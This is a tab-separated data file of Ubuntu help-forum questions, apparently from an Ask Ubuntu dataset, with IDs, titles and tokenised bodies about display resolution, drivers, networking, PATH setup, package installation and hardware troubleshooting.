104763	how to set console resolution of ubuntu server 10.04.03 lts running on esxi5 / vsphere client console	after searching the internet for similar problem or even a solution , i have to post my question here in hope that somebody had the same problem and solved it . my scenario : esxi5.0 server with ubuntu server ( amd64 ) 10.04.03 lts ( updated ) with installed vmware tools . i am using vsphere client to manage the virtual machine and access the console . unfortunately the console resolution is small and i would like to increase it to 1024x768x16 . i have tried every possible `` solution '' published online ( that i 've found ) . as soon as the grub2 entry holds `` set gfxpayload=keep '' afterwards i get a blank screen . i am sure that i am missing some driver that i need to load ( initram or somewhere else ) . thank you for any hint in the right direction ... vsphere client is used on windows platform ( windows 7 and windows 2003 server ) .
104765	how to change the look of openbox ?	i am using openbox environment in ubuntu 11.10 , i wanted to know if there is any way to make it decently-aesthetic . change wallpaper change iconset add menubar thats it
104766	how can i automatically change spaces to underscores in the file save dialog box ?	i am often saving documents from my windows-using coworkers , and the filenames usually contain spaces . for example , i 'm always renaming important ceo spreadsheet v2.xls to ... important_ceo_spreadsheet_v2.xls is there a way to script the save as dialog box to automatically detect whitespace and replace it with underscores ?
104771	where are kernel panic logs ?	i 've got problem with handbrake/ffmpeg . after ~5 minutes transcoding , the computer locks up . i 'm fairly sure it 's a kernel panic because caps-lock starts flashing . there are a few logical questions about what to do and some about specific bugs but i 'm really after one thing : what happened right before everything died ? ! i 've checked /var/log/kern.log and all i see around the time is me sticking in a dvd and then a few minutes later , the system booting up . no errors , no panic notice . is there any way to force panics to be logged ? i 'm fairly sure i can reproduce this ( it 's happened 100 % of the times i 've tried recently ) so while i 'd rather this `` just worked '' , i 'm happy enough to reboot a few times if it means i can find the cause of the panic .
104782	how can i search the ubuntu source code ?	how can i search through the source code used in ubuntu ? there is a notification message that i 'd like to modify to include more data , but it 's not obvious which package it 's a part of . but it includes a pretty specific string that would be easy to search on . i know there are a large number of projects included in ubuntu , but i 'm hoping there 's a good way to find the source when it 's not apparent what program is responsible .
104794	error while trying to install opencv	i an trying to follow the procedure as given in the installation guide http : //opencv.willowgarage.com/wiki/installguide_linux while trying do path configuration i tried creating a opencv.conf file in /etc/ld.so.conf.d/ containing a single line /usr/local/lib . but as soon as i save it i get error message : vineet @ vineet-xps-m1530 /etc/ld.so.conf.d $ sudo gedit opencv.conf ( gedit:3765 ) : gtk-warning ** : attempting to store changes into `/root/.local/share/recently-used.xbel ' , but failed : failed to create file '/root/.local/share/recently-used.xbel.l45s9v ' : no such file or directory ( gedit:3765 ) : gtk-warning ** : attempting to set the permissions of `/root/.local/share/recently-used.xbel ' , but failed : no such file or directory ( gedit:3765 ) : gtk-warning ** : attempting to store changes into `/root/.local/share/recently-used.xbel ' , but failed : failed to create file '/root/.local/share/recently-used.xbel.u5fa9v ' : no such file or directory ( gedit:3765 ) : gtk-warning ** : attempting to set the permissions of `/root/.local/share/recently-used.xbel ' , but failed : no such file or directory ( gedit:3765 ) : gtk-warning ** : attempting to store changes into `/root/.local/share/recently-used.xbel ' , but failed : failed to create file '/root/.local/share/recently-used.xbel.2itb9v ' : no such file or directory ( gedit:3765 ) : gtk-warning ** : attempting to set the permissions of `/root/.local/share/recently-used.xbel ' , but failed : no such file or directory vineet @ vineet-xps-m1530 /etc/ld.so.conf.d $ i am new to linux . please tell me how to do it .
104799	after uninstalling ati fglrx drivers ubuntu 11.10 wont boot	first off this site has been so helpful i 've solved all my issues without even having to ask any questions but this time i 'm stumped . i uninstalled the ati fglrx drivers because i was getting an issue after awhile if i opened any 3d programs ( my game engine , blender 3d . etc ... ) it would log me out and i 'd have to restart my pc to be able to use them . then after awhile the same thing again . well i figured since i had just reinstalled my ati drivers through the terminal beforehand that was the issue so i used the additional drivers program to uninstall it . now when it boots black screens and every minute or so the monitors turn off then back on . cant ctrl+alt+f1 or f2 , etc ... so i tried recovery mode and dropping to shell it cant open the cache or the i uninstalled the ati fglrx drivers dpkg because the read-only filesystem . i 'm stumped , please help ?
104802	install grub from outside ubuntu	running mac os and ubuntu 10.10 booting with refit then grub . updated 10.10 to 11.04 and accidentally put grub on the wrong volume ( i think swap somehow ) . ca n't boot into grub . can i install it onto correct volume using mac os ?
104805	unable to mount ntfs partition `` not authorized ''	this time i installed ubuntu 11.10 in another partition rather than using wubi and making a virtual mount . but now i 'm not able to mount the other ntfs partitions and getting a message unable to mount < partition name > not authorized lol on not authorized . any advice on how can i access my ntfs partition .
104810	why is ubuntu 11.10 download speed slower than windows ?	this is not fair at all . why is the download speed ( both wired and wireless ) in ubuntu 11.10 slower than vista or 7 ? i 've tried all the methods known to get the same speed or at least close the gab to windows ... but none worked . i tried ~ played with the mtu > no success , same speed watch dropped packets / errors > none arised reduced the txqueuelen > nothing happened installed the latest wireless drivers > nothing at all opened all ports / closed firewall in both router and os > no speed performance enhancement stopped using wifi n > nothing changed i 'm still having 1 - 2 mbs / sec less than windows while using ubuntu 11.10 down to 10.04 now , i 'm open to try anything ! just hit me , i 'll give it a try . it 's really annoying to lose in that ground to windows ... i 'm expecting the best performance from my ubuntu ! so , give me a solution please . my setup sony vaio ~ sudo lspci -nn sony vaio ~ sudo lsusb sony vaio ~ /var/log/udev sony vaio ~ /var/log/dmesg sony vaio ~ sudo lshw -class network
104811	is it possible to install ubuntu in tablets & smartphones	i have heard some devices come with ubuntu installed but is it possible to install it on tablets and smartphones that do not have ubuntu preinstalled .
104812	mouse keys settings in 12.04 ?	where have the settings for mouse keys such as `` acceleration '' that used to be present in older versions gone to ? is there a config file where i could edit this manually ? the pointer is moving much more slowly than i 'd like , so i need to know how to adjust it .
104814	why is better to upgrade/install a newer release	i will be talking soon about the advantages of upgrading or installing a newer release of ubuntu instead of sticking to an older version . a behavior i tend to attribute to windows users where they stick to an older version of windows for a long time ( try to picture somebody staying with ubuntu 5.10 up until now and asking why it has x problem with it ) so what advantages does an end user get when upgrading or installing a newer version or the latest version of ubuntu and why is something important to be always up to date in the ubuntu/linux world .
104815	script to login and load main gui in ubuntu 11.10	i have a rfid reader interfaced with an arduino microcontroller left over from a past project , which i would now like to use to automatically login on ubuntu 11.10 . what i 'm imagining specifically is that i would start up my computer normally , it would get to the login screen for ubuntu , i would swipe my rfid card and ubuntu would then begin loading the desktop and everything as though i had typed in my password . i have a python script already made that can read the rfid tag and use it to decrypt my password , and i can set it up to run when the computer starts up . i just have no idea what scripts ubuntu runs when a user logs in . basically , all i need to know is what to add to my script so ubuntu will load my profile and desktop as though i had just entered my password on the normal login screen .
104818	how to disable overlay scrollbar hiding behavior	if i move mouse cursor on the scrollbar and do n't move it then scrollbar just hides after few seconds . how can i disable such behavior ?
104821	how do you map `` £ '' to [ rightalt ] + [ 3 ] ?	i 've recently acquired a new 84-key us layout keyboard , which has fewer keys than a standard uk layout keyboard . i 'm using it in en-us layout to avoid being unable to type # but i 'd still like to be able to type £ without using alt codes and would like to map it to [ rightalt ] + [ 3 ] . i 've managed to map € to [ rightalt ] + [ 4 ] using ubuntu 's built-in keyboard config tool but i 'm a bit stuck on how to go about achieving what i want in ubuntu 11.10 .
104824	port forward to a port on the same machine	i used to run a service on port 25570 i 'm now changing it to run on port 25565 but i still want people who try to access it on the old port to have access to the service . so i 'd like to forward port 25570 to 25565 on the same machine . i know there 's a lot of questions that talk about forwarding to a different machine but i was wondering if the method is different when using the same machine ?
104825	ca n't find the logout+shutdown menu	i removed the by default rightmost menu from the panel ( the one allowing logout , reboot , shutdown , etc . ) and ca n't find it in the `` add to panel '' menu . i 'm using ubuntu 10.4 with the gnome panel 2.30.2 .
104829	how to remove all images from a ppt files ?	i have a big ( ~250mb ) ppt file ( created on windows i guess ) with much text and some images ( high definition ) . i have to drop all images ( i dont actually need to save them , just rip them out the presentation ) from the ppt file : is there a way ( via command line perhaps ? ) to automatically remove all of them ?
104831	how to delete all the files with a certain extension from a folder and all of its subfolders ?	i want to remove all the .jpg files from my music folder in order to save room . my music folder contains subfolders , and i would like to know if there is a command to remove all the .jpg files from all these folders regardless of their level . thanks for your help !
104833	adobe update caused my foxtabs quit working !	i use foxtabs on firefox so when i open firefox or a new tab my top sites are there ready to be cliked well now i ca n't clik them since i updated last night how do i fix this i cant live without my foxtabs
104834	set up a vpn , route samba over it	i get 3 ip addresses from my isp , so after my modem i have a switch with three things . two are servers , one is a router . all my personal computers are behind the router . my old server used to have two ethernet ports , so i would put one on the switch and one on the router so that i could keep server traffic off the router and still be able to have samba shares for media . my new lower-power server only has one lan . i will eventually get a usb ethernet plug for it , but until then i 'd like to still have my samba shares . i thought to myself , there must be some way to achieve this via vpn . so what i 'd like to do is this , set up a vpn server on the server , allow clients behind the router to connect to it . that seemed simple enough , except that all the guides i 've seen assume you can allocate addresses on the server 's lan . since my server 's lan is the public internet i ca n't really do that . is there any way i can make up some 'imaginary ' lan that exists only in the mind of the server and put my vpn clients on that ? to clarify , if the server is 68.232.sss.sss and if the router is 68.232.rrr.rrr and if computers behind the router are 10.0.0.1-255 then can i make vpn clients use addresses like 192.168.0.vpn ? ooooooooooooo ooo public ooooo -- -- -server eth0 ( real ) 68.232.sss.sss ooo internet ooo eth1 ( virtual ) 192.168.0.1 oooooooooooooo | \ -- router eth0 ( wan ) 68.232.rrr.rrr | eth1 ( lan ) 10.0.0.1 | \ -- -- -client eth1 ( virtual ) 192.168.0.2 eth0 ( real ) 10.0.0.2
104840	adding directory to path , various ways and differences	i have seen the thread how to add a directory to my path ? i already have added the directory in my path by directly editing the /etc/environment . however , i do not get the command working when i use it as $ sudo command -- options however , things work great when i do # command -- options or $ command -- options why is this the case ? also , this is not my full question . i would be thankful if someone could explain the various ways of adding directories to the path , how they work , and when is each of them in effect . how are they different ? the point of the question is not so much to get things working , but to understand how it all works . pointing to a guide that explains this would be a great answer too .
104843	delete file from the /usr/sbin	what is the goal of /usr/sbin folder ? i found in that folder modem-manager , which makes me many problems . can i delete it from that directory ?
104844	how to see terminal commands generated by gui actions	i am new to linux and only know my way around because of the gui . is there a way to see the equivalent commands on the terminal to do the same things as using the gui ? thanks
104846	libcurl error when running boinc	i downloaded the latest versione of boinc x64 . when i run the manager , there is an error ./boincmgr : error while loading shared libraries : libcurl.so.4 : can not open shared object file : no such file or directory
104848	how can i see a folder 's exact size in bytes ?	i have a folder with 40 gb of dozens of directories and stuff , and i want to see the exact size of the root folder in bytes .. i have tried using this , but it shows the size in kilobytes : du -s foldername
104851	adduser says user exists when the user does not exist	as the subject says , i 'm trying to add a new user . when i run the command , it says the user already exists . but looking in /etc/passwd , /etc/group , and /etc/shadow shows that the user does not exist . running the command on my local machine works just fine . i 'm running ubuntu 11.10 on both . here 's my terminal commands and output : root @ ws-prod-www-01 : ~ # useradd -s /sbin/nologin -m -d /var/www/html/atc -g 33 -u 10141 atc useradd : user 'atc ' already exists root @ ws-prod-www-01 : ~ # grep atc /etc/passwd speech-dispatcher : x:111:29 : speech dispatcher , , , :/var/run/speech-dispatcher : /bin/sh root @ ws-prod-www-01 : ~ # grep atc /etc/shadow speech-dispatcher : ! :15259:0:99999:7 : : : root @ ws-prod-www-01 : ~ # grep atc /etc/group root @ ws-prod-www-01 : ~ # i also tried : root @ ws-prod-www-01 : ~ # adduser -- shell /sbin/nologin -- home /var/www/html/atc -- gid 33 -- uid 10141 atc warning : the home dir /var/www/html/atc you specified already exists . adduser : the user `atc ' already exists . root @ ws-prod-www-01 : ~ # any thoughts ?
104854	why does my thinkpad t520 keep dropping network connection ?	i have a thinkpad t520 running ubuntu 11.10 ( amd64 ) . i am connecting to a cisco wap ( 802.11n ) secured with wpa2 . at random times ( happens up to a few times per hour ) i lose connectivity . the network shows as connected , but i can not access any lan or wan resources ( can not ping my gateway either ) . the only way to get it working again is to turn off the physical wlan switch , wait a moment , and then turn it back on ( disconnecting / reconnecting and disabling / reenabling via the software menu does n't work ) . any ideas why this might be occurring and what i can do to fix this issue ? would like to test drive 11.10 for a bit longer , but will have to move back to windows if i ca n't get this resolved ( as it is impacting productivity ) . thank you in advance .
104857	can t520+bumblebee run an external monitor via displayport ?	using 64-bit ubuntu 11.10 and integrated ( intel ) graphics , i can run the 1600x900 laptop display plus a 1600x1200 external monitor connected to the vga adapter . but my external monitor is 1920x1200 so i have black stripes on each side . i believe the resolution is limited like this as the maximum resolution available from the intel gpu is 2560x1600 = 4,096,000 pixels and i 'm asking for a 3520x1200 = 4,224,000 display ( with 1200x300 lost above the laptop screen ) . at 3200x1200 = 3,840,000 pixels , the intel gpu seems happy . under windows , the same limit exists when using the vga adapter , but if i turn optimus on then i can connect the external monitor to the displayport and get its full resolution and an extended desktop . i 've seen that bumblebee can run apps on the displayport using the 'optirun ' command . my question is : can bumblebee run the displayport in concert with the intel card running the laptop screen creating a large virtual desktop ( as on windows ) ? if so , are there any pointers to how to do this ? i tried once , failed , and dropped back to integrated graphics ( and black stripes ) as i could find no reports of this configuration working .
104858	mouse is choppy	when i installed ubuntu ( 11.10 ) a few days ago , my mouse cursor was smooth and responsive . now it 's very slow , choppy , and clumsy . i had n't really changed much ( at least i do n't think so ) , all i 've really done is just install ubuntu and install of all its updates . i 'm pretty sure it just started happening the first or second time i rebooted . i 'm very new to linux , and do n't even know where to begin . can anyone offer some assistance ? system info : intel 920 i7 @ 3.6ghz ( 2.66 stock ) 6gb ddr3 ram 2x radeon hd 6860 ( i have n't done anything to enable crossfire in ubuntu , though ) wd 120gb hdd thank you .
104859	moving the desktop toolbar	i am using ubuntu 11.10 with gnome . i 'm not sure what it 's called , but the toolbar on the left hand screen that hides itself and contains icons for software updates and my home folder and such is in a really annoying place . i 'd like to move it to the bottom of the screen . i 've tried right clicking and dragging , but to no avail . how do i do this ?
104870	how do i change the desktop wallpaper to a dual screen image	i found many articles that were similar to mine , but none with my specific problem . i have a dual screen setup and i am using ubuntu 11.10- i changed my wallpaper from one dual screen image ( 1600x600 ) to another ( 2560x1024 ) using the system settings > appearance > wallpapers menu . it worked fine . then ( being an idiot ) i decided i wanted to try some different ones that ubuntu provided . i chose one that came packaged ( the grass ai n't greener 2000x1250 ) then i decided to go back to the original . this is where the problem started . using the wallpaper menu , i could no longer select any images that have previously been used as wallpapers . what gives ?
104871	what properties of a wifi card can be changed to improved transmitting & receiving	when i type iwconfig i see several properties of my wifi cards like : frequency tx power bit rate and others ... . what options can be changed to tune/tweak a wifi card . for example can i modify via the terminal or gui the tx power , frequency or any other properties of the card .
104877	how do i install flash in to firefox running with wine ?	i 'm using a website called busuu.com , which also let you chat and video chat , but you need adobe flash to do so . i have ubuntu and i have also chromiun and i have installed flash , but will not let me use the camera . i have decided to use firefox with wine to see if it would work but did not , i could not install flash in to it . what can i do about this ? my webcam works fine in ubuntu , i have cheese and i take pictures . but im thinking that the problem is the webpage beacause is there where the cam doesn ; t work at all . i 'm going to try in other webpage . my computer is a dell inpiron mini 10-12. my webcam the original 0.3 megapixels.i have ubuntu 11.10 ( original from user ) my problema es el siguiente : soy usuario de una pagina web llamada busuu.com , donde permiten chatear y tambien videochat , pero hay que tener adobe flash para poder hacerlo . en ubuntu tengo chromiun y tengo tambien adobe flash , pero no me permite usar la camara . decidi utilizar firefox con wine con la esperanza de poder hacerlo , pero no tiene el adobe flash plash , he tratado de instalarlo pero no puedo . que debo hacer ?
104879	why does n't ubuntu make a dvd iso ?	i mean , i think it might be kind of cool if they made a bigger installation media with more applications , maybe include various other environment ( okay , probably not going to do that but as it seems you are downsizing your based off of distros ) . you might also have like option bundles like say a security bundle with nmap or something like that or perhaps a artsy one with gimp and other multimedia creation apps . just wondering ?
104880	touchpad not working on lenovo u400	i just got lenovo u400 laptop and promptly installed ubuntu 11.10 . i got the wifi card working no problem by following some other threads on here , but i 'm having issues with the trackpad . it works fine with just a single finger moving around , but scrolling does n't work . also , this trackpad supports multitouch which would be cool to get working , if feasible . i 've followed instructions located here : https : //bugs.launchpad.net/ubuntu/+source/xf86-input-multitouch/+bug/308191/+index ? comments=all but the synaptics-dkms package i downloaded errored out on install . do you guys have any other ideas ? xinput list gives me this : $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ imps/2 generic wheel mouse id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ lenovo easycamera id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] ↳ ideapad extra buttons id=13 [ slave keyboard ( 3 ) ] i do n't actually have a mouse plugged in , so i 'm wondering why it would show a generic wheel mouse ...
104884	how can i remove shortcuts in cinnamon ?	i 'm using ubuntu 11.10 with cinnamon . how can i remove shortcuts ?
104885	ubuntu freezes while working	ubuntu on my laptop has frozen multiple times in last 6-7 months . its not frequent but i can not relate the freezing to anything which i was doing . today it froze again when i was taking notes in class - approximately at 12:00 pm . during the freeze both mouse and keyboard stopped working . i tried alt-ctrl-f1 , alt-ctrl-f2 etc without any success . after that i waited few minutes & then i restarted the laptop . i checked /var/log/syslog and /var/log/kern.log and it seems that it did not log anything ( i was not able to understand most of it ) . please let me know if you can find something unusual at around 12:00 pm . is there any other log which might be useful ? here are the /var/log/syslog and /var/log/kern.log files .
104894	how to fix my usb headset microphone ( works for one second then input stops working )	i am using a plantronics headset via usb . this worked flawlessly for a long time . now the microphone works for about 1 or 2 seconds when plugged in and then stops working . the hardware is alright ( tested on other systems ) . since this happens with gnome or kde alike i think there must be some flaw in the setup somewhere . google could n't help - so now i am looking for some help to cleanly set up the whole usb sound system . how do i have to proceed to make sure the usb sound configuration is correct ? ( running ubuntu 11.10 )
104897	putting chromium back into gnome shell notifications	so i 'm loving gnome shell under 11.10 on my hp mini 100-3000 , but i 've removed chromium from the background tasks that would show on the bottom notification display . simple question : how do i put it back ? i 've been looking for an answer for the last few days and have come up with nothing so far . any suggestions ?
104899	make apt-get ( or aptitude ) run with -y but not prompt for replacement of configuration files ?	when running apt-get -y install < packages ... > on ubuntu 10.04 i would like apt-get ( or aptitude if that makes it easier ) to not prompt me when installing additional dependencies ( behavior of -y as i understand it ) and but not prompt me about overwriting configuration files , instead assume to keep the existing ones always ( which is usually the default ) . unfortunately -- trivial-only seems to be the inverse of -y and not affect the prompt that is shown , according to the man page . in particular packages auch as samba , nullmailer , localepurge and lighttpd have forced me to interact with the terminal , even though the whole procedure was scripted and meant to be non-interactive .
104903	how do i kill processes in ubuntu ?	how do i kill all processes running by my own non-root account ? i have some spinning smbd processes that i caused from my windows machine and so i telnetted into the linux server and i want to kill those spinning processes . i do n't have authority to restart services or reboot the machine .
104905	how to see how long a device has been on ( for devices that support this )	what tools does ubuntu have that can say how long a device has been on . the time on should not be based on when ubuntu was installed since for example the pc could be 2 years old and after that long somebody could have installed ubuntu . this 2 years could not be taken into consideration . not to confuse with uptime for example . is there a way to determine the time a device has been on or active and what tools can see this . for example i know hard drives can say this . what other devices could and what tools for this devices .
104906	how i can set default cursors theme for current user	i do n't want to edit /usr/share/icons/default/index.theme or change alternatives update-alternatives -- config x-cursor-theme because different users use different cursors theme . so i need to specify it for current users . i try to use following locations ~/.icons/default ~/.local/share/icons/default but without success .
104911	unity icons disappared	hi guys i have newly setup and installed all the updates for ubuntu but a few of the icons on the unity bar are not showing up and i 'm getting gray boxes instead for system settings , terminal and trash icons . any ideas and why this is happening ? the hardware i 'm running is : pci ( sysfs ) ally-inspiron-n5110 description : computer width : 32 bits *-core description : motherboard physical id : 0 *-memory description : system memory physical id : 0 size : 3189mib *-cpu product : intel ( r ) core ( tm ) i7-2630qm cpu @ 2.00ghz vendor : intel corp. physical id : 1 bus info : cpu @ 0 version : 6.10.7 serial : 0002-06a7-0000-0000-0000-0000 size : 800mhz capacity : 800mhz width : 64 bits capabilities : fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp x86-64 constant_tsc arch_perfmon pebs bts xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm sse4_1 sse4_2 x2apic popcnt xsave avx lahf_lm ida arat epb xsaveopt pln pts tpr_shadow vnmi flexpriority ept vpid cpufreq configuration : id=0 *-logicalcpu:0 description : logical cpu physical id : 0.1 width : 64 bits capabilities : logical *-logicalcpu:1 description : logical cpu physical id : 0.2 width : 64 bits capabilities : logical *-logicalcpu:2 description : logical cpu physical id : 0.3 width : 64 bits capabilities : logical *-logicalcpu:3 description : logical cpu physical id : 0.4 width : 64 bits capabilities : logical *-logicalcpu:4 description : logical cpu physical id : 0.5 width : 64 bits capabilities : logical *-logicalcpu:5 description : logical cpu physical id : 0.6 width : 64 bits capabilities : logical *-logicalcpu:6 description : logical cpu physical id : 0.7 width : 64 bits capabilities : logical *-logicalcpu:7 description : logical cpu physical id : 0.8 width : 64 bits capabilities : logical *-logicalcpu:8 description : logical cpu physical id : 0.9 width : 64 bits capabilities : logical *-logicalcpu:9 description : logical cpu physical id : 0.a width : 64 bits capabilities : logical *-logicalcpu:10 description : logical cpu physical id : 0.b width : 64 bits capabilities : logical *-logicalcpu:11 description : logical cpu physical id : 0.c width : 64 bits capabilities : logical *-logicalcpu:12 description : logical cpu physical id : 0.d width : 64 bits capabilities : logical *-logicalcpu:13 description : logical cpu physical id : 0.e width : 64 bits capabilities : logical *-logicalcpu:14 description : logical cpu physical id : 0.f width : 64 bits capabilities : logical *-logicalcpu:15 description : logical cpu physical id : 0.10 width : 64 bits capabilities : logical *-pci description : host bridge product : 2nd generation core processor family dram controller vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 09 width : 32 bits clock : 33mhz configuration : driver=agpgart-intel resources : irq:0 *-pci:0 description : pci bridge product : xeon e3-1200/2nd generation core processor family pci express root port vendor : intel corporation physical id : 1 bus info : pci @ 0000:00:01.0 version : 09 width : 32 bits clock : 33mhz capabilities : pci normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 ioport : e000 ( size=4096 ) memory : f5000000-f60fffff ioport : e0000000 ( size=301989888 ) *-display description : vga compatible controller product : nvidia corporation vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory : f5000000-f5ffffff memory : e0000000-efffffff memory : f0000000-f1ffffff ioport : e000 ( size=128 ) memory : f6000000-f607ffff *-multimedia description : audio device product : gf108 high definition audio controller vendor : nvidia corporation physical id : 0.1 bus info : pci @ 0000:01:00.1 version : a1 width : 32 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=hda intel latency=0 resources : irq:17 memory : f6080000-f6083fff *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:57 memory : f6400000-f67fffff memory : d0000000-dfffffff ioport : f000 ( size=64 ) *-communication description : communication controller product : 6 series/c200 series chipset family mei controller # 1 vendor : intel corporation physical id : 16 bus info : pci @ 0000:00:16.0 version : 04 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=mei latency=0 resources : irq:16 memory : f7b0a000-f7b0a00f *-usb:0 description : usb controller product : 6 series/c200 series chipset family usb enhanced host controller # 2 vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 04 width : 32 bits clock : 33mhz capabilities : ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:16 memory : f7b08000-f7b083ff *-multimedia description : audio device product : 6 series/c200 series chipset family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 04 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=hda intel latency=0 resources : irq:58 memory : f7b00000-f7b03fff *-pci:1 description : pci bridge product : 6 series/c200 series chipset family pci express root port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : b4 width : 32 bits clock : 33mhz capabilities : pci normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:41 *-pci:2 description : pci bridge product : 6 series/c200 series chipset family pci express root port 2 vendor : intel corporation physical id : 1c.1 bus info : pci @ 0000:00:1c.1 version : b4 width : 32 bits clock : 33mhz capabilities : pci normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:42 ioport : d000 ( size=4096 ) ioport : f3200000 ( size=1048576 ) *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 05 serial : 78:2b : cb : e0:4d : e2 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=192.168.1.3 latency=0 multicast=yes port=mii speed=100mbit/s resources : irq:46 ioport : d000 ( size=256 ) memory : f3204000-f3204fff memory : f3200000-f3203fff *-pci:3 description : pci bridge product : 6 series/c200 series chipset family pci express root port 4 vendor : intel corporation physical id : 1c.3 bus info : pci @ 0000:00:1c.3 version : b4 width : 32 bits clock : 33mhz capabilities : pci normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:43 memory : f7a00000-f7afffff *-network description : wireless interface product : centrino wireless-n 1030 vendor : intel corporation physical id : 0 bus info : pci @ 0000:09:00.0 logical name : wlan0 version : 34 serial : bc:77:37:3b : d2:6f width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=3.0.0-16-generic firmware=17.168.5.1 build 33993 latency=0 multicast=yes wireless=ieee 802.11bgn resources : irq:56 memory : f7a00000-f7a01fff *-pci:4 description : pci bridge product : 6 series/c200 series chipset family pci express root port 5 vendor : intel corporation physical id : 1c.4 bus info : pci @ 0000:00:1c.4 version : b4 width : 32 bits clock : 33mhz capabilities : pci normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:44 memory : f7900000-f79fffff *-usb description : usb controller product : upd720200 usb 3.0 host controller vendor : nec corporation physical id : 0 bus info : pci @ 0000:0b:00.0 version : 04 width : 64 bits clock : 33mhz capabilities : xhci bus_master cap_list configuration : driver=xhci_hcd latency=0 resources : irq:16 memory : f7900000-f7901fff *-pci:5 description : pci bridge product : 6 series/c200 series chipset family pci express root port 8 vendor : intel corporation physical id : 1c.7 bus info : pci @ 0000:00:1c.7 version : b4 width : 32 bits clock : 33mhz capabilities : pci normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:45 ioport : b000 ( size=8192 ) memory : f6800000-f78fffff ioport : f2100000 ( size=17825792 ) *-usb:1 description : usb controller product : 6 series/c200 series chipset family usb enhanced host controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 04 width : 32 bits clock : 33mhz capabilities : ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:23 memory : f7b07000-f7b073ff *-isa description : isa bridge product : hm67 express chipset family lpc controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 04 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : latency=0 *-storage description : sata controller product : 6 series/c200 series chipset family 6 port sata ahci controller vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 version : 04 width : 32 bits clock : 66mhz capabilities : storage ahci_1.0 bus_master cap_list configuration : driver=ahci latency=0 resources : irq:47 ioport : f0b0 ( size=8 ) ioport : f0a0 ( size=4 ) ioport : f090 ( size=8 ) ioport : f080 ( size=4 ) ioport : f060 ( size=32 ) memory : f7b06000-f7b067ff *-serial unclaimed description : smbus product : 6 series/c200 series chipset family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 04 width : 64 bits clock : 33mhz configuration : latency=0 resources : memory : f7b05000-f7b050ff ioport : f040 ( size=32 )
104918	how to get hostname from dhcp server	i want ubuntu to get hostname and dns name from dhcp client . default installation of 11.10 does not do that . update : same question asked and unsolved
104920	installing software that is unavailable in standard repositories [ decision tree ]	what are the general steps i want to take to get a program installed on ubuntu when the program has not been made into a package , or i need an updated software version from what would normally be installed and that version is available in a later repository ? i 'll give you my specific example . i 'm currently using 10.04lts and i do n't want to upgrade . i want to install the expect-lite package , but it 's only available for ubuntu 11.10 ( oneiric ocelot ) http : //packages.ubuntu.com/oneiric/expect-lite the decision tree i think i want to implement is the following ( i think i 'm currently at step # 3 ) : apt-get install # if available ( or by using the gui package manager ) enable universe and multiverse if not already and repeat step 1 . install a package from a later version of ubuntu . ( how ? what pitfalls do i need to watch for ? ) install a package from an unstable version of debian . ( same questions from above ) find and install a package from ubuntu 's ppa ( personal package archive ) , realising that packages are not reviewed for malicious backdoors or trojans , and this risk could be unacceptable to many people ) if one has the ability , create a personal package from source , and install that ( and upload it to the ppa archive if possible to make it available to others ) install directly from source , and make a dummy package to deal with any dependency issues ( knowing full well that this could cause issues if a distro upgrade was attempted later ) ( info : http : //eric.lubow.org/2010/system-administration/creating-dummy-packages-on-debian/ ) install directly from source as a last ditch effort . edited to add : use the package alien to convert a .rpm package to a .deb and then install ( see this ) ( from bluexrider 's answer below ) see if you can find the package in a non-standard repository or download a .deb file from a trusted source and use that .
